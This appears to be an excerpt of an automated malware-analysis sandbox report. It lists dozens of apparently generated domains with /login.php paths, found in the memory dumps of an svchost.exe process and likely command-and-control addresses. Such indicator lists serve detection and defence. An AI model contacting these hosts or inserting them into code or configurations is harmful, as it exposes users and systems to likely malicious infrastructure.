Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2022281788.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzeb.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzus.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhab.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhuh.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykaz.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykuw.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganynos.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypeb.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypeb.com/login.phpc
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqow.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyriz.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794628079.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797125735.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794197803.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793490988.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793720143.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796578932.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845335727.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrys.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvoz.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzas.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqycyz.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111825344.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114379239.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2520844909.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2517095584.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydaz.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2109895377.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyfub.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyhaw.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykus.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynyw.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqis.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyreh.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyres.com/login.php
Source: svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvob.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048160160.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzoh.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyduh.com/login.php
Source: svchost.exe, 00000002.00000003.2521249928.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349320135.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474446421.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2491632486.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2545737260.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1373797577.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269117845.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585293008.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150807320.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413994603.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2439022495.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357632057.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571812.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373341442.000000000084C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.php
Source: svchost.exe, 00000002.00000003.2521249928.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349320135.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474446421.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2491632486.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2545737260.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269117845.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585293008.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150807320.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413994603.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2439022495.000000000084C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571812.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373341442.000000000084C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.phpC:
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhos.com/login.php
Source: svchost.exe, 00000002.00000003.2394184434.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004799359.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998684932.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001263336.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181277.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatykow.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatykyh.com/login.php
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/Pd
